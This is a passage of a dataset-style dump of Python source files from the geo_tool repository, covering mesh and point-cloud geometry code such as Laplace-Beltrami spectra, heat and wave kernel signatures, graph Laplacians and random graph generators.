"text": "'''\nCreated on July 11, 2017\n\n@author: optas\n'''\nimport numpy\nimport matplotlib.pyplot as plt\n\ntry:\n from mayavi import mlab as mayalab\nexcept:\n print('mayavi not installed.')\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom . point_cloud import Point_Cloud\n\nl2_norm = numpy.linalg.norm\n\n\ndef plot_pclouds_on_grid(pclouds, grid_size, fig_size=(50, 50), plot_kwargs={}):\n '''Input\n pclouds: Iterable holding point-cloud data. pclouds[i] must be a 2D array with any number of rows and 3 columns.\n '''\n fig = plt.figure(figsize=fig_size)\n c = 1\n for cloud in pclouds:\n plt.subplot(grid_size[0], grid_size[1], c, projection='3d')\n plt.axis('off')\n ax = fig.axes[c - 1]\n Point_Cloud(points=cloud).plot(axis=ax, show=False, **plot_kwargs)\n c += 1\n return fig\n\n\ndef plot_vector_field_mayavi(points, vx, vy, vz):\n mayalab.quiver3d(points[:, 0], points[:, 1], points[:, 2], vx, vy, vz)\n mayalab.show()\n\n\ndef plot_vector_field_matplotlib(pcloud, vx, vy, vz, normalize=True, length=0.01):\n fig = plt.figure()\n ax = Axes3D(fig)\n pts = pcloud.points\n if normalize:\n row_norms = l2_norm(pts, axis=1)\n pts = pts.copy()\n pts = (pts.T / row_norms).T\n return ax.quiver3D(pts[:, 0], pts[:, 1], pts[:, 2], vx, vy, vz, length=length)\n"
},
{
"alpha_fraction": 0.6070736646652222,
"alphanum_fraction": 0.6184592843055725,
"avg_line_length": 36.18918991088867,
"blob_id": "aab27bb6ca68a6d4ea446c7d1e0d853ae57275d7",
"content_id": "e2c43e7516e7b1abe341e03edaab47d45ed2df2d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8256,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 222,
"path": "/signatures/node_signatures.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas.\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n@updated: Winnie Lin ([email protected]), March 2018.\n'''\n\nimport numpy as np\nimport math\nimport scipy.sparse as sparse\nfrom scipy.sparse.linalg import eigs\n\nfrom general_tools.rla.one_d_transforms import smooth_normal_outliers, find_non_homogeneous_vectors\nfrom general_tools.arrays.basics import scale\nfrom .. utils import linalg_utils as utils\n\n\ndef fiedler_of_component_spectra(in_mesh, in_lb, thres):\n spectra, multi_cc = in_lb.multi_component_spectra(2, thres)\n n_cc = len(multi_cc)\n aggregate_color = np.zeros((in_mesh.num_vertices, 1))\n for i in xrange(n_cc):\n nodes = multi_cc[i]\n if spectra[i]:\n magic_color = scale(spectra[i][1][:, -1]**2)\n aggregate_color[nodes] = magic_color.reshape(len(nodes), 1)\n return aggregate_color[:, 0]\n\n\ndef hks_of_component_spectra(in_mesh, in_lb, area_type, percent_of_eigs, time_horizon, min_nodes=None, min_eigs=None, max_eigs=None):\n spectra, multi_cc = in_lb.multi_component_spectra(in_mesh, area_type, percent_of_eigs,\n min_nodes=min_nodes, min_eigs=min_eigs, max_eigs=max_eigs)\n n_cc = len(multi_cc)\n hks_signature = np.zeros((in_mesh.num_vertices, time_horizon))\n aggregate_color = np.zeros((in_mesh.num_vertices, ))\n\n for i in xrange(n_cc):\n nodes = multi_cc[i]\n if spectra[i]:\n evals = spectra[i][0]\n evecs = spectra[i][1].T\n pos_index = evals > 0\n if np.sum(pos_index) == 0:\n continue\n evals = evals[pos_index]\n evecs = evecs[pos_index, :]\n evecs = np.around(evecs, 2)\n smooth_normal_outliers(evecs, 3)\n index = find_non_homogeneous_vectors(evecs, 0.95)\n if len(index) >= 2:\n evecs = evecs[index, :]\n evals = evals[index] + 1 # Add 1 to make the division on time_samples strictly decreasing\n ts = hks_time_sample_generator(evals[0], evals[-1], time_horizon)\n sig = heat_kernel_signature(evals, evecs, ts)\n sig = sig / utils.l2_norm(sig, axis=0)\n hks_signature[nodes, :] = sig\n magic_color = scale(np.sum(sig, 1))\n aggregate_color[nodes] = magic_color.reshape(len(nodes), 1)\n\n return aggregate_color, hks_signature\n\n\ndef gaussian_curvature(in_mesh):\n acc_map = in_mesh.triangles.ravel()\n angles = in_mesh.angles_of_triangles().ravel()\n acc_array = np.bincount(acc_map, weights=angles)\n gauss_curv = (2 * np.pi - acc_array)\n gauss_curv = gauss_curv.reshape(len(gauss_curv), 1)\n gauss_curv /= in_mesh.area_of_vertices()\n return gauss_curv\n\n\ndef mean_curvature(in_mesh, laplace_beltrami):\n N = in_mesh.normals_of_vertices()\n mean_curv = 0.5 * np.sum(N * (laplace_beltrami.W * in_mesh.vertices), 1)\n return mean_curv\n\n\ndef heat_kernel_embedding(lb, n_eigs, n_time):\n evals, evecs = lb.spectra(n_eigs)\n pos_index = evals > 0\n evals = evals[pos_index]\n evecs = evecs[:, pos_index]\n time_points = hks_time_sample_generator(evals[0], evals[-1], n_time)\n return heat_kernel_signature(evals, evecs.T, time_points)\n\n\ndef heat_kernel_signature(evals, evecs, time_horizon, verbose=False):\n ''' given eigenbasis of mesh's Laplace Beltrami operator, returns the heat kernel signature at each time point within the time_horizon.\n\n input dimensions:\n evecs = (n_vecs, n_vertices)\n evals = (n_vecs,)\n time_horizon = [n_timepoints]\n\n output dimensions = (n_vertices,n_timepoints)\n '''\n\n if len(evals) != evecs.shape[0]:\n raise ValueError('Eigenvectors must have dimension = #eigen-vectors x nodes.')\n if verbose:\n print \"Computing Heat Kernel Signature with %d eigen-pairs.\" % (len(evals),)\n\n n = evecs.shape[1] # Number of nodes.\n signatures = np.empty((n, len(time_horizon)))\n squared_evecs = np.square(evecs)\n for t, tp in enumerate(time_horizon):\n interm = np.exp(-tp * evals)\n signatures[:, t] = np.matmul(interm, squared_evecs)\n\n return signatures\n\n\ndef hks_time_sample_generator(min_eval, max_eval, time_points):\n '''\n returns sampled time intervals to be passed into heat_kernel_signature().\n\n output dimensions = [time_points]\n '''\n\n if max_eval <= min_eval or min_eval <= 0:\n raise ValueError('Two non-negative and sorted eigen-values are expected as input.')\n\n logtmin = math.log(math.log(10) / max_eval)\n logtmax = math.log(math.log(10) / min_eval)\n assert(logtmax > logtmin) \n stepsize = (logtmax - logtmin) / (time_points - 1) #minus 1 is to ensure we reach max\n logts = [logtmin + i * stepsize for i in range(time_points)]\n return [math.exp(i) for i in logts]\n\n\ndef wave_kernel_signature(evals, evecs, energies, sigma=1):\n ''' given eigenbasis of mesh's Laplace Beltrami operator, returns the wave kernel signature at each time point within the time_horizon.\n\n input dimensions:\n evecs = (n_vecs, n_vertices)\n evals = (n_vecs,)\n energies = [n_timepoints]\n output dimensions = (n_vertices,n_timepoints)\n '''\n\n if len(evals) != evecs.shape[0]:\n raise ValueError('Eigenvectors must have dimension = #eigen-vectors x nodes.')\n\n n = evecs.shape[1] # Number of nodes.\n signatures = np.empty((n, len(energies)))\n squared_evecs = np.square(evecs)\n\n log_evals = np.log(evals)\n var = 2 * (sigma**2)\n for t, en in enumerate(energies):\n interm = np.exp(-(en - log_evals) ** 2 / var)\n norm_factor = 1 / np.sum(interm)\n signatures[:, t] = np.matmul(interm, squared_evecs) * norm_factor\n\n assert(np.alltrue(signatures >= 0))\n return signatures\n\n\ndef wks_energy_generator(min_eval, max_eval, time_points, padding=7, shrink=1):\n '''\n returns sampled energy intervals to be passed into wave_kernel_signature().\n\n output dimensions = [time_points]\n\n parameters from original paper:\n emin= e_1+2*sigma\n emax= e_n-2*sigma\n delta= (emax-emin)/num_timepoints\n sigma= 7*delta\n\n '''\n\n if min_eval == 0:\n raise ValueError('minimum eigenvalue must not be zero.')\n\n logmin = math.log(min_eval)\n logmax = math.log(max_eval)\n logmax = shrink * logmax + (1 - shrink) * logmin\n #if shrink != 1:\n # emax = math.log(max_eval) / float(shrink)\n #else:\n # emax = math.log(max_eval)\n #if emax <= emin:\n # print \"Warning: too much shrink. - Will be set manually.\"\n # emax = emin + 0.05 * emin\n\n delta = (logmax - logmin) / (time_points + 2 * padding - 1) #minus 1 is to ensure we reach emax (emax = logmax - sigma)\n sigma = padding * delta\n emin = logmin + sigma\n res = [emin + i * delta for i in range(time_points)]\n return res, sigma\n\n\ndef merge_component_spectra(in_mesh, in_lb, percent_of_eigs, merger=np.sum):\n spectra, multi_cc = in_lb.multi_component_spectra(in_mesh, percent=percent_of_eigs)\n n_cc = len(multi_cc)\n signature = np.zeros((in_mesh.num_vertices, 1))\n for i in xrange(n_cc):\n nodes = multi_cc[i]\n if spectra[i]:\n magic_color = merger(spectra[i][1]**2, axis=1)\n signature[nodes] = magic_color.reshape(len(nodes), 1)\n return signature[:, 0]\n\n\ndef extrinsic_laplacian(in_mesh, num_eigs):\n V = in_mesh.vertices\n E = in_mesh.undirected_edges()\n vals = V[E[:, 1]]\n Wx = sparse.csr_matrix((vals[:, 0], (E[:, 0], E[:, 1])), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n Wy = sparse.csr_matrix((vals[:, 1], (E[:, 0], E[:, 1])), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n Wz = sparse.csr_matrix((vals[:, 2], (E[:, 0], E[:, 1])), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n _, evecsx = eigs(Wx, num_eigs, which='LM')\n _, evecsy = eigs(Wy, num_eigs, which='LM')\n _, evecsz = eigs(Wz, num_eigs, which='LM')\n evecsx = np.sum(evecsx.real, axis=1)\n evecsy = np.sum(evecsy.real, axis=1)\n evecsz = np.sum(evecsz.real, axis=1)\n return np.vstack((evecsx, evecsy, evecsz))\n"
},
{
"alpha_fraction": 0.8108108043670654,
"alphanum_fraction": 0.8108108043670654,
"avg_line_length": 37,
"blob_id": "fbe4f711b22d5f6fd2b1a3a482a26b9ddc180d53",
"content_id": "14527d3211072a302dd3cde461dc0f77e404dde0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 37,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 1,
"path": "/point_clouds/__init__.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "from . point_cloud import Point_Cloud"
},
{
"alpha_fraction": 0.8190045356750488,
"alphanum_fraction": 0.8190045356750488,
"avg_line_length": 43.20000076293945,
"blob_id": "18f5811ae9796b950de6e6101db8148665da0212",
"content_id": "73217f1fca52f82d2a648f88ff145f2d8a1362e6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 5,
"path": "/__init__.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "from . fundamentals.graph import Graph\nfrom . fundamentals.cuboid import Cuboid\nfrom . solids.mesh import Mesh\nfrom . laplacians.laplace_beltrami import Laplace_Beltrami\nfrom . point_clouds.point_cloud import Point_Cloud\n"
},
{
"alpha_fraction": 0.5739851593971252,
"alphanum_fraction": 0.5853339433670044,
"avg_line_length": 38.162391662597656,
"blob_id": "c0d98b2c1d4e8ad03fb292ef9ee03cb6cce4eb65",
"content_id": "892de8eab6dbc28c3ef6eea389be5d453ee3040e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4582,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 117,
"path": "/laplacians/laplace_beltrami.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on July 21, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport warnings\nimport numpy as np\n#from scipy import sparse\nimport scipy.sparse as sparse\n\nfrom scipy.sparse.linalg import eigs\nfrom math import ceil\n\nfrom .. utils import linalg_utils as utils\nfrom .. utils.linalg_utils import l2_norm\nfrom .. solids import mesh_cleaning as cleaning\nfrom .. fundamentals.graph import Graph\n\n\nclass Laplace_Beltrami(object):\n '''A class representing a discretization of the Laplace Beltrami operator, associated with a given\n Mesh object.\n '''\n def __init__(self, in_mesh):\n '''\n Constructor\n Notes: when a duplicate triangle exists for instance it will contribute twice in\n the computation of the area of each of its vertices.\n '''\n if cleaning.has_duplicate_triangles(in_mesh): # Add test for zero areas. and degenerate triangles cotangent is infinite there).\n raise ValueError('The given mesh contains duplicate triangles. Please clean them before making an LB.')\n self.M = in_mesh\n self.W = Laplace_Beltrami.cotangent_laplacian(self.M)\n\n def spectra(self, k, area_type='barycentric'):\n A = self.M.area_of_vertices(area_type)\n A = sparse.spdiags(A[:, 0], 0, A.size, A.size)\n evals, evecs = eigs(self.W, k, A, sigma=-10e-1, which='LM')\n\n if np.any(l2_norm(evecs.imag, axis=0) / l2_norm(evecs.real, axis=0) > 1.0 / 100):\n warnings.warn('Produced eigen-vectors are complex and contain significant mass on the imaginary part.')\n\n evecs = evecs.real # eigs returns complex values by default.\n evals = evals.real\n\n nans = np.isnan(evecs)\n if nans.any():\n warnings.warn('NaN values were produced in some evecs. These evecs will be dropped.')\n ok_evecs = np.sum(nans, axis=0) == 0\n\n if ok_evecs.any():\n evecs = evecs[:, ok_evecs]\n evals = evals[ok_evecs]\n else:\n return []\n\n gram_matrix = (A.dot(evecs)).T.dot(evecs)\n gram_matrix = gram_matrix - np.eye(evecs.shape[1])\n if np.max(gram_matrix) > 10e-5:\n warnings.warn('Eigenvectors are not orthogonal within 10e-5 relative error.')\n\n evals, evecs = utils.sort_spectra(evals, evecs)\n\n return evals, evecs\n\n def multi_component_spectra(self, k, area_type, percent=None, min_nodes=None, min_eigs=None, max_eigs=None, thres=1):\n _, node_labels = self.M.connected_components()\n cc_at_thres = Graph.largest_connected_components_at_thres(node_labels, thres)\n n_cc = len(cc_at_thres)\n E = list()\n for i in xrange(n_cc):\n keep = cc_at_thres[i]\n temp_mesh = self.M.copy()\n cleaning.filter_vertices(temp_mesh, keep)\n cleaning.clean_mesh(temp_mesh)\n num_nodes = temp_mesh.num_vertices\n if min_nodes is not None and num_nodes < min_nodes:\n E.append([])\n continue\n if percent is not None:\n k = int(ceil(percent * num_nodes))\n\n if min_eigs is not None:\n k = max(k, min_eigs)\n\n if max_eigs is not None:\n k = min(k, max_eigs)\n try:\n feasible_k = min(k, num_nodes - 2)\n E.append((Laplace_Beltrami(temp_mesh).spectra(feasible_k, area_type)))\n except:\n print('Component {0} failed.'.format((i)))\n E.append([])\n return E, cc_at_thres\n\n @staticmethod\n def cotangent_laplacian(in_mesh):\n '''Computes the cotangent laplacian weight matrix. Also known as the stiffness matrix.\n Output: a PSD matrix.\n '''\n T = in_mesh.triangles\n angles = in_mesh.angles_of_triangles()\n I = np.hstack([T[:, 0], T[:, 1], T[:, 2]])\n J = np.hstack([T[:, 1], T[:, 2], T[:, 0]])\n S = 0.5 / np.tan(np.hstack([angles[:, 2], angles[:, 0], angles[:, 1]])) # TODO-P Possible division by zero\n In = np.hstack([I, J, I, J])\n Jn = np.hstack([J, I, I, J])\n Sn = np.hstack([-S, -S, S, S])\n W = sparse.csc_matrix((Sn, (In, Jn)), shape=(in_mesh.num_vertices, in_mesh.num_vertices))\n if utils.is_symmetric(W, tolerance=10e-5) == False:\n warnings.warn('Cotangent matrix is not symmetric within epsilon: %f' % (10e-5,))\n W /= 0.5\n W = W + W.T\n return W\n"
},
{
"alpha_fraction": 0.5782527923583984,
"alphanum_fraction": 0.5869888663291931,
"avg_line_length": 36.36111068725586,
"blob_id": "64e14f75c80edcef0b96fe3fa3f02f0ca1bdab7d",
"content_id": "092748f6b670ddcb67e6cb8c24144dc72df8b5de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5380,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 144,
"path": "/fundamentals/graph.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on August 3, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nfrom scipy import sparse as sparse\nfrom numpy.matlib import repmat\n\nfrom .. utils import linalg_utils as lu\n\n\nclass Graph(object):\n '''A class offering some basic graph-related functions. It uses mostly scipy modules.\n '''\n\n def __init__(self, adjacency, is_directed):\n '''\n Constructor\n '''\n self.adjacency = adjacency\n self.is_directed = is_directed\n\n def edges(self):\n '''\n ''' # TODO return values too.\n if self.is_directed:\n E = self.adjacency.nonzero()\n else:\n E = sparse.triu(self.adjacency).nonzero() # TODO: Assumes - sparse storage.\n return E\n\n @staticmethod\n def connected_components(A):\n return sparse.csgraph.connected_components(A, directed=False)\n\n @staticmethod\n def largest_connected_components_at_thres(node_labels, thres):\n '''\n Marks the nodes that exist in the largest connected components so that [thres] percent of total nodes are covered.\n '''\n if thres <= 0 or thres > 1:\n raise ValueError('threshold variable must be in (0,1].')\n\n unique_labels, counts = np.unique(node_labels, return_counts=True)\n decreasing_index = [np.argsort(counts)[::-1]]\n counts = counts[decreasing_index]\n unique_labels = unique_labels[decreasing_index]\n cumulative = np.cumsum(counts, dtype=np.float32)\n cumulative /= cumulative[-1]\n n_cc = max(1, np.sum(cumulative <= thres))\n cc_marked_list = [np.where(node_labels == unique_labels[i])[0] for i in range(n_cc)]\n assert(any([len(x)<=0 for x in cc_marked_list]) == False)\n return cc_marked_list\n\n @staticmethod\n def knn_to_adjacency(neighbors, weights, direction='out'):\n '''Converts neighborhood-like data into the adjacency matrix of an underlying graph.\n\n Args:\n neighbors - (N x K) neighbors(i,j) is j-th neighbor of the i-th node.\n\n weights - (N x K) weights(i,j) is the weight of the (directed) edge between i to j.\n\n direction - (optional, String) 'in' or 'out'. If 'in' then weights(i,j) correspond to an edge\n that points towards i. Otherwise, towards j. Default = 'out'.\n\n Returns:\n A - (N x N) sparse adjacency matrix, (i,j) entry corresponds to an edge from i to j.\n '''\n\n if np.any(weights < 0):\n raise ValueError('Non negative weights for an adjacency matrix are not supported.')\n\n n, k = neighbors.shape\n temp = repmat(np.arange(n), k, 1).T\n i = temp.ravel()\n j = neighbors.ravel()\n v = weights.ravel()\n\n A = sparse.csr_matrix((v, (i, j)), shape=(n, n))\n if direction == 'in':\n A = A.T\n return A\n\n @staticmethod\n def adjacency_to_laplacian(A, laplacian_type='comb'):\n '''Computes the laplacian matrix for a graph described by its adjacency matrix.\n\n Args: A - (n x n) Square symmetric adjacency matrix of a graph with n nodes.\n laplacian_type - (String, optional) Describes the desired type of laplacian.\n\n Valid values:.\n 'comb' - Combinatorial (unormalized) laplacian (Default value).\n 'norm' - Symmetric Normalized Laplacian.\n 'sign' - Signless Laplacian.\n\n Output: L - (n x n) sparse matrix of the corresponding laplacian.\n\n Notes:\n DOI: \"A Tutorial on Spectral Clustering, U von Luxburg\".\n\n (c) Panos Achlioptas 2015 - http://www.stanford.edu/~optas/FmapLib\n '''\n\n if not lu.is_symmetric(A):\n raise ValueError('Laplacian implemented only for square and symmetric adjacency matrices.')\n\n n = A.shape[1]\n total_weight = A.sum(axis=1).squeeze()\n D = sparse.spdiags(total_weight, 0, n, n)\n\n if laplacian_type == 'comb':\n L = -A + D\n elif laplacian_type == 'norm':\n total_weight = (1 / np.sqrt(total_weight)).squeeze()\n Dn = sparse.spdiags(total_weight, 0, n, n)\n L = Dn.dot(-A + D).dot(Dn)\n elif laplacian_type == 'sign':\n L = A + D\n else:\n raise ValueError('Please provide a valid argument for the type of laplacian.')\n return L\n\nif __name__ == '__main__':\n from geo_tool.solids import mesh_cleaning as cleaning\n from geo_tool.solids.mesh import Mesh\n\n off_file = '/Users/t_achlp/Documents/DATA/ModelNet10/OFF_Original/bathtub/train/bathtub_0001.off'\n in_mesh = Mesh(off_file)\n in_mesh.center_in_unit_sphere()\n cleaning.clean_mesh(in_mesh, level=3, verbose=False)\n\n cloud_points, face_ids = in_mesh.sample_faces(2000)\n from scipy import spatial\n tree = spatial.KDTree(cloud_points, leafsize=100)\n weights, neighbors = tree.query(cloud_points, 10)\n weights = weights[:, 1:]\n neighbors = neighbors[:, 1:]\n weights = np.exp(- weights**2 / (2 * np.median(weights)))\n A = Graph.knn_to_adjacency(neighbors, weights)\n"
},
{
"alpha_fraction": 0.5632364749908447,
"alphanum_fraction": 0.5777690410614014,
"avg_line_length": 38.16923141479492,
"blob_id": "a5e7b628255598d64fa3c2027ad2805064271789",
"content_id": "574866f65efba84933e3cb86b60b28a74f1e31df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2546,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 65,
"path": "/solids/legacy_code.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Feb 14, 2018\n\n@author: optas\n'''\n\n# soligs.Mesh\ndef sample_faces(self, n_samples, at_least_one=True, seed=None):\n \"\"\"Generates a point cloud representing the surface of the mesh by sampling points\n proportionally to the area of each face.\n\n Args:\n n_samples (int) : number of points to be sampled in total\n at_least_one (int): Each face will have at least one sample point (TODO: broken fix)\n Returns:\n numpy array (n_samples, 3) containing the [x,y,z] coordinates of the samples.\n\n Reference :\n http://chrischoy.github.in_out/research/barycentric-coordinate-for-mesh-sampling/\n [1] Barycentric coordinate system\n\n \\begin{align}\n P = (1 - \\sqrt{r_1})A + \\sqrt{r_1} (1 - r_2) B + \\sqrt{r_1} r_2 C\n \\end{align}\n \"\"\"\n\n face_areas = self.area_of_triangles()\n face_areas = face_areas / np.sum(face_areas)\n\n n_samples_per_face = np.round(n_samples * face_areas)\n\n if at_least_one:\n n_samples_per_face[n_samples_per_face == 0] = 1\n\n n_samples_per_face = n_samples_per_face.astype(np.int)\n n_samples_s = int(np.sum(n_samples_per_face))\n\n if seed is not None:\n np.random.seed(seed)\n\n # Control for float truncation (breaks the area analogy sampling)\n diff = n_samples_s - n_samples\n indices = np.arange(self.num_triangles)\n if diff > 0: # we have a surplus.\n rand_faces = np.random.choice(indices[n_samples_per_face >= 1], abs(diff), replace=False)\n n_samples_per_face[rand_faces] = n_samples_per_face[rand_faces] - 1\n elif diff < 0:\n rand_faces = np.random.choice(indices, abs(diff), replace=False)\n n_samples_per_face[rand_faces] = n_samples_per_face[rand_faces] + 1\n\n # Create a vector that contains the face indices\n sample_face_idx = np.zeros((n_samples, ), dtype=int)\n\n acc = 0\n for face_idx, _n_sample in enumerate(n_samples_per_face):\n sample_face_idx[acc: acc + _n_sample] = face_idx\n acc += _n_sample\n\n r = np.random.rand(n_samples, 2)\n A = self.vertices[self.triangles[sample_face_idx, 0], :]\n B = self.vertices[self.triangles[sample_face_idx, 1], :]\n C = self.vertices[self.triangles[sample_face_idx, 2], :]\n P = (1 - np.sqrt(r[:, 0:1])) * A + np.sqrt(r[:, 0:1]) * (1 - r[:, 1:]) * B + \\\n np.sqrt(r[:, 0:1]) * r[:, 1:] * C\n return P, sample_face_idx\n"
},
{
"alpha_fraction": 0.6279229521751404,
"alphanum_fraction": 0.645116925239563,
"avg_line_length": 33.630950927734375,
"blob_id": "7cc478c4691955b5c931da1eecaa59d433042dd9",
"content_id": "471ea8374c46a987ea968b17dba08b43ce142357",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2908,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 84,
"path": "/private/scratch.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016.\nDirty scripts checking geo_tool functionality \n\n@author: Panayotes Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n \n \n\n\nimport sys\nimport numpy as np\nimport os.path as osp\nfrom scipy import spatial\n\ngit_path = '/Users/optas/Documents/Git_Repos/'\nsys.path.insert(0, git_path)\n\nfrom geo_tool import Mesh, Graph, Point_Cloud, Laplace_Beltrami\nimport geo_tool.solids.mesh_cleaning as cleaning\nimport geo_tool.signatures.node_signatures as ns\nimport geo_tool.in_out.soup as gio\n\n############################################################\n## TODO: check ravel() vs. np.repeat (used in geo_tool)\n## \n## \n############################################################ \n\ndef main_Mesh(): \n off_file = '/Users/optas/DATA/Shapes/Model_Net_10/OFF_Original/bathtub/train/bathtub_0001.off'\n \n in_mesh = Mesh(off_file=off_file)\n in_mesh.center_in_unit_sphere()\n cleaning.clean_mesh(in_mesh, level=3, verbose=True)\n \n in_lb = Laplace_Beltrami(in_mesh)\n n_cc, node_labels = in_mesh.connected_components()\n parts_id = Graph.largest_connected_components_at_thres(node_labels, 1)\n print 'Number of connected components = %d.' % (n_cc)\n\n percent_of_eigs = 1\n min_eigs = None\n max_eigs = None\n min_vertices = None\n time_horizon = 10\n area_type = 'barycentric'\n\n v_color = ns.hks_of_component_spectra(in_mesh, in_lb, area_type, percent_of_eigs, \\\n time_horizon, min_vertices, min_eigs, max_eigs)[0]\n\n in_mesh.plot(vertex_function=v_color)\n\n\ndef main_Point_Cloud_Saliency():\n ply_file = '/Users/optas/Documents/Git_Repos/autopredictors/point_cloud_saliency/test_data/dragon_heavily_sub_sampled.ply'\n from autopredictors import point_cloud_saliency\n \n \ndef main_Point_Cloud():\n ply_file = '/Users/optas/Documents/Git_Repos/autopredictors/point_cloud_saliency/test_data/airplane.ply'\n cloud = Point_Cloud(ply_file=ply_file)\n print cloud\n\ndef main_Point_Cloud_Annotations(): \n class_id = '02958343'\n model_id = '1a0c91c02ef35fbe68f60a737d94994a' \n# anno_file = '/Users/optas/DATA/Shapes/Shape_Net_Core_with_Part_Anno/v0/' + class_id + '/points_label/wheel/' + model_id + '.seg'\n anno_file = '/Users/optas/DATA/Shapes/Shape_Net_Core_with_Part_Anno/v0/' + class_id + '/expert_verified/points_label/' + model_id + '.seg'\n pts_file = '/Users/optas/DATA/Shapes/Shape_Net_Core_with_Part_Anno/v0/' + class_id + '/points/' + model_id + '.pts'\n points = gio.load_crude_point_cloud(pts_file)\n anno = gio.load_annotation_of_points(anno_file)\n point_cloud = Point_Cloud(points = points)\n point_cloud.plot(c=anno)\n \n\nif __name__ == '__main__':\n# main_Mesh()\n# main_Point_Cloud()\n# main_Point_Cloud_Saliency()\n main_Point_Cloud_Annotations()"
},
{
"alpha_fraction": 0.5804196000099182,
"alphanum_fraction": 0.5874125957489014,
"avg_line_length": 26.0222225189209,
"blob_id": "5986ef2b1e0c69f76d1c4980cb061e540d3d13c2",
"content_id": "ff90b9e0ac6dff18288589e2823ab8632d65890c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2431,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 90,
"path": "/utils/graph_generators.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 26, 2017\n\n@author: optas\nTODO: Merge/ re-factor (fundamentals/graph + graph_roles)\nPRELIMINARY CODE - not used/debugged yet. \n\n'''\n\nimport numpy as np\nimport random\n\nfrom scipy.sparse import coo_matrix\n\n\ndef adjacency_from_edges(edges, n_nodes, sparse=True, dtype=np.int32):\n source_e = np.array([i[0] for i in edges])\n target_e = np.array([i[1] for i in edges])\n vals = np.ones_like(source_e, dtype=dtype)\n if sparse:\n res = coo_matrix((vals, (source_e, target_e)), shape=(n_nodes, n_nodes), dtype=dtype)\n else:\n raise NotImplementedError()\n return res\n\n\ndef gnm_random_graph(n, m, seed=None, directed=False):\n \"\"\"Returns a `G_{n,m}` random graph.\n\n In the `G_{n,m}` model, a graph is chosen uniformly at random from the set\n of all graphs with `n` nodes and `m` edges.\n\n This algorithm should be faster than :func:`dense_gnm_random_graph` for\n sparse graphs.\n\n Parameters\n ----------\n n : int\n The number of nodes.\n m : int\n The number of edges.\n seed : int, optional\n Seed for random number generator (default=None).\n directed : bool, optional (default=False)\n If True return a directed graph\n\n See also\n --------\n dense_gnm_random_graph\n\n \"\"\"\n max_edges = n * (n - 1)\n if not directed:\n max_edges /= 2.0\n if m >= max_edges:\n raise ValueError('Too many edges.')\n\n nlist = np.arange(n)\n edge_count = 0\n edges = set()\n while edge_count < m:\n # generate random edge u,v\n u = random.choice(nlist)\n v = random.choice(nlist)\n if u == v or (u, v) in edges:\n continue\n else:\n edges.add((u, v))\n if not directed:\n edges.add((v, u))\n edge_count += 1\n\n return adjacency_from_edges(edges, n)\n\n\ndef SBM_from_class_labels(vertex_labels, p_matrix):\n 'stochastic block model'\n n_vertices = len(vertex_labels)\n adjacency = np.zeros(shape=(n_vertices, n_vertices), dtype=np.bool)\n for row, _row in enumerate(adjacency):\n for col, _col in enumerate(adjacency[row]):\n community_a = vertex_labels[row]\n community_b = vertex_labels[col]\n p = random.random()\n val = p_matrix[community_a][community_b]\n\n if p <= val:\n adjacency[row][col] = 1\n adjacency[col][row] = 1\n return adjacency"
},
{
"alpha_fraction": 0.5429388284683228,
"alphanum_fraction": 0.5612751245498657,
"avg_line_length": 45.6274528503418,
"blob_id": "82874c886eb2063ae7b20bf80be0748b95b9d129",
"content_id": "8cecdcbfe711d23828a60d3cec069658c9d6c088",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11889,
"license_type": "permissive",
"max_line_length": 193,
"num_lines": 255,
"path": "/rendering/mitsuba_rendering.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
